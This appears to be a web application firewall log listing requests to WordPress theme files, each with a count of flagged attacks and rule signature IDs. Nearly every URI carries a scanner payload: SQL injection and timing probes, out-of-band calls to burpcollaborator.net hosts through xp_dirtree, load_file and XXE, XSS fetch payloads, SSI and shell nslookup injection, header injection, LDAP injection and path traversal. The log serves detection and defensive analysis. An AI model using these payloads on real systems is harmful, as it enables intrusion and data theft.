Packet [195]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1'%20and%203088%3d3088--%20=1]	Nattacks [5 ]	Signatures	[942130]	[942180]	[942330]	[942400]	[942440]
Packet [196]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1'%20and%206733%3d6736--%20=1]	Nattacks [4 ]	Signatures	[942180]	[942330]	[942400]	[942440]
Packet [197]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1'%2b(function()%7bif(typeof%20umkoz%3d%3d%3d%22undefined%22)%7bvar%20a%3dnew%20Date()%3bdo%7bvar%20b%3dnew%20Date()%3b%7dwhile(b-a%3c20000)%3bumkoz%3d1%3b%7d%7d())%2b'=1]	Nattacks [11 ]	Signatures	[932140]	[933161]	[934100]	[934100]	[942110]	[942130]	[942130]	[942150]	[942410]	[942430]	[942431]
Packet [198]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1'%2b(select%20load_file('%5c%5c%5c%5c6ahyii7vwd90dsfto5jvp3lpfgle9fx60uuhk59.burpcollaborator.net%5c%5cand'))%2b'=1]	Nattacks [10 ]	Signatures	[942360]	[942110]	[942150]	[942260]	[942310]	[942370]	[942410]	[942490]	[942431]	[942511]
Packet [199]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c57axfh4utc6zarcsl4gum2iocfid6eu5ltfg54u.burpcollab'%2b'orator.net%5cslb'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [14 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942490]	[942431]
Packet [200]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20zbicu%20SYSTEM%20%22http%3a%2f%2f77czfj4wte61atcul6gwm4iqchif6gukie54tt.burpcollab'%7c%7c'orator.net%2f%22%3e%25zbicu%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1]	Nattacks [19 ]	Signatures	[920220]	[920272]	[932115]	[933190]	[941100]	[941130]	[941340]	[942360]	[942110]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [201]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1')%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cfp87xrm4bmo9s1u23ey44c0yup0noocf53zqpee.burpcollab'%2b'orator.net%5caew'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [202]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1'=1]	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [203]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1)%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c2z2u7ewrl9yw2o4pd18rezal4caaybm2eq8dy1n.burpcollab'%2b'orator.net%5cxao'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [14 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942490]	[942431]
Packet [204]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1)waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [5 ]	Signatures	[942280]	[942300]	[942440]	[942490]	[942431]
Packet [205]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?123087093'%20or%20'1836'%3d'1840=1]	Nattacks [7 ]	Signatures	[942180]	[942330]	[942340]	[942370]	[942390]	[942490]	[942511]
Packet [206]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?128973187%20or%203395%3d3400--%20=1]	Nattacks [2 ]	Signatures	[942390]	[942440]
Packet [207]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?147969281'%20or%204385%3d4389--%20=1]	Nattacks [4 ]	Signatures	[942180]	[942330]	[942390]	[942440]
Packet [208]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?150406041%20or%206317%3d06317=1]	Nattacks [1 ]	Signatures	[942390]
Packet [209]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?153069563%20or%209919%3d9921=1]	Nattacks [1 ]	Signatures	[942390]
Packet [210]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?160694784'%20or%202753%3d2753--%20=1]	Nattacks [5 ]	Signatures	[942130]	[942180]	[942330]	[942390]	[942440]
Packet [211]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?165708910'%20or%20'7692'%3d'7692=1]	Nattacks [8 ]	Signatures	[942130]	[942180]	[942330]	[942340]	[942370]	[942390]	[942490]	[942511]
Packet [212]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?199820105%20or%202778%3d02778--%20=1]	Nattacks [2 ]	Signatures	[942390]	[942440]
Packet [213]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?1l0fvk%25%3eyqsul'%2f%22%3cw6f08=1]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942370]
Packet [214]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?eval(compile('for%20x%20in%20range(1)%3a%5cn%20import%20time%5cn%20time.sleep(20)'%2c'a'%2c'single'))=1]	Nattacks [11 ]	Signatures	[933160]	[933161]	[934100]	[942160]	[942150]	[942200]	[942370]	[942410]	[942430]	[942431]	[942511]
Packet [215]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fas620mpzehr4vwxx691z773txk3irjfb6z0mqafX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [216]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Italic.ttf.woff2?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2ft3xlb50ip02n6f8ghsciiqec83e122quhib51tqX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [220]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?%22--%3e'--%3e%60--%3e%3c!--%23set%20var%3d%22w9v%22%20value%3d%22v8ung75ku2%22--%3e%3c!--%23set%20var%3d%22ybx%22%20value%3d%22xawpi97mw4%22--%3e%3c!--%23echo%20var%3d%22w9v%22--%3e%3c!--%23echo%20var%3d%22ybx%22--%3e%3c!--%23exec%20cmd%3d%22nslookup%20-q%3dcname%20ivha3us7hpucy4059h47af610s6qujibgzam0ap.burpcollaborator.net%22%20--%3e=1]	Nattacks [9 ]	Signatures	[941160]	[941180]	[942110]	[942260]	[942300]	[942370]	[942430]	[942440]	[942431]
Packet [221]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fbp43xnm0bio5sxuy3ay0480uul0jocc42swfm3b%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [222]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fuommw6lja1norgth2txj3rzdt4z2nvbn1bvylma%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [223]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?(function()%7bif(typeof%20qbdw5%3d%3d%3d'undefined')%7bvar%20a%3dnew%20Date()%3bdo%7bvar%20b%3dnew%20Date()%3b%7dwhile(b-a%3c20000)%3bqbdw5%3d1%3b%7d%7d())=1]	Nattacks [9 ]	Signatures	[932140]	[933161]	[934100]	[942130]	[942150]	[942410]	[942430]	[942431]	[942511]
Packet [224]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20prixr%20SYSTEM%20%22http%3a%2f%2fquoi22rfgxtkxczd8p3f9n59z05ytrhu5oseg3.burpcollab'%7c%7c'orator.net%2f%22%3e%25prixr%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [17 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [225]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?(select%20load_file('%5c%5c%5c%5cwbboj88lx3aqeigjpvklqtmfg6m4axyo0cuzkn9.burpcollaborator.net%5c%5cruc'))=1]	Nattacks [6 ]	Signatures	[942360]	[942150]	[942260]	[942310]	[942410]	[942431]
Packet [226]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?(select*from(select(sleep(20)))a)=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942360]	[942150]	[942200]	[942410]	[942431]
Packet [227]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1%0d%0aBCC%3ay98qha6nv58sckelnxinovkhe8k68zwrpfj29qy@burpcollaborator.net%0d%0ayfl%3a%20p=1]	Nattacks [2 ]	Signatures	[920272]	[921150]
Packet [228]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1%20and%20(select*from(select(sleep(20)))a)--%20=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942150]	[942200]	[942410]	[942440]	[942431]
Packet [229]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1%20and%201114%3d01114=1]	Nattacks [1 ]	Signatures	[942400]
Packet [230]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1%20and%206548%3d6553--%20=1]	Nattacks [2 ]	Signatures	[942400]	[942440]
Packet [231]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1%20and%208234%3d08234--%20=1]	Nattacks [2 ]	Signatures	[942400]	[942440]
Packet [232]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1%20and%209905%3d9913=1]	Nattacks [1 ]	Signatures	[942400]
Packet [233]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1%20into%20outfile%20'%5c%5c%5c%5cij5arug75picm4o5xhs7yfu1osuqij6aay4lu9j.burpcollaborator.net%5c%5cbvt'%3b%20--%20=1]	Nattacks [5 ]	Signatures	[942190]	[942260]	[942370]	[942480]	[942440]
Packet [234]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1%20waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [5 ]	Signatures	[942280]	[942300]	[942440]	[942490]	[942431]
Packet [235]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1%22=1]	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [236]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1%25%7die6bj'%2f%22%3cxsycs=1]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [237]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1%2b(select*from(select(sleep(20)))a)%2b=1]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942360]	[942150]	[942200]	[942410]	[942431]
Packet [238]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1%2c0)waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [6 ]	Signatures	[942280]	[942200]	[942300]	[942440]	[942490]	[942431]
Packet [239]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5ci7qafu47tp6ca4c5lhg7mfi1csiq6juakyel49t.burpcollab'%2b'orator.net%5cwwk'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [240]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1%3e%0d%0aBCC%3auommw6lja1norgth2txj3rzdt4z2nvbn5bzypme@burpcollaborator.net%0d%0aaku%3a%20u=1]	Nattacks [3 ]	Signatures	[920272]	[921150]	[942130]
Packet [242]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1'%20and%20'1275'%3d'1275=1]	Nattacks [8 ]	Signatures	[942130]	[942180]	[942330]	[942340]	[942370]	[942400]	[942490]	[942511]
Packet [243]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1'%20and%20'1497'%3d'1502=1]	Nattacks [7 ]	Signatures	[942180]	[942330]	[942340]	[942370]	[942400]	[942490]	[942511]
Packet [244]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1'%20and%205351%3d5352--%20=1]	Nattacks [4 ]	Signatures	[942180]	[942330]	[942400]	[942440]
Packet [245]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1'%20and%205749%3d5749--%20=1]	Nattacks [5 ]	Signatures	[942130]	[942180]	[942330]	[942400]	[942440]
Packet [246]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1'%2b(function()%7bif(typeof%20k038x%3d%3d%3d%22undefined%22)%7bvar%20a%3dnew%20Date()%3bdo%7bvar%20b%3dnew%20Date()%3b%7dwhile(b-a%3c20000)%3bk038x%3d1%3b%7d%7d())%2b'=1]	Nattacks [11 ]	Signatures	[932140]	[933161]	[934100]	[934100]	[942110]	[942130]	[942130]	[942150]	[942410]	[942430]	[942431]
Packet [247]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1'%2b(select%20load_file('%5c%5c%5c%5cisea0up7eprcv4x56h177f31xs3qrjfaiycl29r.burpcollaborator.net%5c%5cujm'))%2b'=1]	Nattacks [9 ]	Signatures	[942360]	[942110]	[942150]	[942260]	[942310]	[942370]	[942410]	[942431]	[942511]
Packet [248]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cgqa8ysn5cnpat2v34fz55d1zvq1ophd84wyjo7d.burpcollab'%2b'orator.net%5cjqp'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [249]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20prixr%20SYSTEM%20%22http%3a%2f%2fmd3elyabztcgg8i9rlmbsjo5iwoucn0rolbbz0.burpcollab'%7c%7c'orator.net%2f%22%3e%25prixr%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'=1]	Nattacks [19 ]	Signatures	[920220]	[920272]	[932115]	[933190]	[941100]	[941130]	[941340]	[942360]	[942110]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [250]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1')%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cy65qea3ns55s9kblkxfnlvhhb8h65ztqmeg16pv.burpcollab'%2b'orator.net%5cxbj'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [251]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1'=1]	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [252]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1)%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5ckwkc4wt9irvez617aj59bh731u7svljcb05nvbk.burpcollab'%2b'orator.net%5chbx'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20=1]	Nattacks [13 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]
Packet [253]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1)waitfor%20delay'0%3a0%3a20'--=1]	Nattacks [5 ]	Signatures	[942280]	[942300]	[942440]	[942490]	[942431]
Packet [254]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?114283234'%20or%20'8367'%3d'8374=1]	Nattacks [7 ]	Signatures	[942180]	[942330]	[942340]	[942370]	[942390]	[942490]	[942511]
Packet [255]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?129050445%20or%201299%3d01299=1]	Nattacks [1 ]	Signatures	[942390]
Packet [256]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?153850145%20or%208216%3d08216--%20=1]	Nattacks [2 ]	Signatures	[942390]	[942440]
Packet [257]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?160490091'%20or%205632%3d5636--%20=1]	Nattacks [4 ]	Signatures	[942180]	[942330]	[942390]	[942440]
Packet [258]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?164318675%20or%209885%3d9892--%20=1]	Nattacks [2 ]	Signatures	[942390]	[942440]
Packet [259]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?177301611%20or%206868%3d6872=1]	Nattacks [1 ]	Signatures	[942390]
Packet [260]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?188018342'%20or%203646%3d3646--%20=1]	Nattacks [5 ]	Signatures	[942130]	[942180]	[942330]	[942390]	[942440]
Packet [261]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?189739949'%20or%20'1228'%3d'1228=1]	Nattacks [8 ]	Signatures	[942130]	[942180]	[942330]	[942340]	[942370]	[942390]	[942490]	[942511]
Packet [262]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?1sewjy%25%3ed11gu'%2f%22%3cth9ok=1]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942370]
Packet [263]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?eval(compile('for%20x%20in%20range(1)%3a%5cn%20import%20time%5cn%20time.sleep(20)'%2c'a'%2c'single'))=1]	Nattacks [11 ]	Signatures	[933160]	[933161]	[934100]	[942160]	[942150]	[942200]	[942370]	[942410]	[942430]	[942431]	[942511]
Packet [264]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2f435wbg0tpb2y6q8rh3cti1en8eec25qxhlb81wqX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [265]	Uri [/web/wp-content/themes/twentytwentytwo/assets/fonts/SourceSerif4Variable-Roman.ttf.woff2?javascript%3a%2f*%3c%2fscript%3e%3cimg%2fonerror%3d'-%2f%22%2f-%2f%20onmouseover%3d1%2f-%2f[%60*%2f[]%2f[(new(Image)).src%3d(%2f%3b%2f%2b%2fn1pf9zycnu0h496afmacgkc66xcv0oogf49rzfoX%3b.burpcollaborator.net%2f).replace(%2f.%3b%2fg%2c[])]%2f%2f'src%3d%3e=1]	Nattacks [17 ]	Signatures	[941100]	[941120]	[941160]	[941170]	[941210]	[941150]	[941320]	[941340]	[942150]	[942260]	[942330]	[942340]	[942370]	[942410]	[942430]	[942440]	[942431]
Packet [274]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver='%22%3e%3csvg%2fonload%3dfetch%60%2f%2f121tadzqo81v5n7og0bqhydk7bd910psfg63wrl%5c.burpcollaborator.net%60%3e]	Nattacks [8 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942490]	[942431]	[942460]
Packet [275]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20grvcl%20SYSTEM%20%22http%3a%2f%2fqiciq2ff4xhklcndwprfxnt9n0tyhp5stjg94y.burpcollab'%7c%7c'orator.net%2f%22%3e%25grvcl%3b]%3e')%2c'%2fl')%20from%20dual)]	Nattacks [18 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]	[942460]
Packet [276]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=(select%20load_file('%5c%5c%5c%5cjaxbiv78wq9dd5f6oij8pgl2ftlr9ix9zxqkg85.burpcollaborator.net%5c%5cxwz'))]	Nattacks [7 ]	Signatures	[942360]	[942150]	[942260]	[942310]	[942410]	[942431]	[942460]
Packet [277]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=*)(!(objectClass%3d*)]	Nattacks [3 ]	Signatures	[921200]	[942431]	[942460]
Packet [278]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=*)(objectClass%3d*]	Nattacks [1 ]	Signatures	[921200]
Packet [279]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [280]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [283]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0%25%7dnva5q'%2f%22%3cc37m7]	Nattacks [3 ]	Signatures	[920220]	[920272]	[942460]
Packet [284]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0%2c(select*from(select(sleep(20)))a)]	Nattacks [7 ]	Signatures	[933161]	[942160]	[942360]	[942150]	[942200]	[942410]	[942431]
Packet [285]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cx75pf94mt46rajcklwgmmuigc7i56wunkbby1mq.burpcollab'%2b'orator.net%5cvvo'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20]	Nattacks [14 ]	Signatures	[932100]	[932105]	[932115]	[942190]	[942320]	[942210]	[942260]	[942300]	[942370]	[942470]	[942430]	[942440]	[942431]	[942460]
Packet [286]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0%7b$%7bsleep(20)%7d%7d]	Nattacks [8 ]	Signatures	[932105]	[932115]	[932130]	[933161]	[942160]	[942150]	[942410]	[942431]
Packet [287]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0%7cnslookup%20-q%3dcname%20pzsh71welwyj2b4cdo8eema84zaxyomkabx1lq.burpcollaborator.net.%26]	Nattacks [2 ]	Signatures	[932105]	[932110]
Packet [289]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&'%22%3e%3csvg%2fonload%3dfetch%60%2f%2fgyi86sv5knxa1233cf75dd9z3q9oxfl7bv5iv6k%5c.burpcollaborator.net%60%3e=1]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942260]	[942431]
Packet [290]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20cjvhm%20SYSTEM%20%22http%3a%2f%2fdev5mpb20kd7hzj0scn2tapwjnpldc1fp9cz0o.burpcollab'%7c%7c'orator.net%2f%22%3e%25cjvhm%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [17 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [291]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20hlkam%20SYSTEM%20%22http%3a%2f%2fwiioq8fl43hqlinjwvrlxttfn6t4hv5ytsgi47.burpcollab'%7c%7c'orator.net%2f%22%3e%25hlkam%3b]%3e')%2c'%2fl')%20from%20dual)=1]	Nattacks [17 ]	Signatures	[920220]	[920272]	[933190]	[941100]	[941130]	[941340]	[942360]	[942120]	[942150]	[942200]	[942260]	[942310]	[942370]	[942410]	[942430]	[942490]	[942431]
Packet [292]	Uri [/web/wp-content/themes/twentytwentytwo/style.css?ver=1.0&(select%20load_file('%5c%5c%5c%5cn1pf9zycnu0h496afmacgkc66xcv0modq1koacz.burpcollaborator.net%5c%5cczc'))=1]	Nattacks [6 ]	Signatures	[942360]	[942150]	[942260]	[942310]	[942410]	[942431]
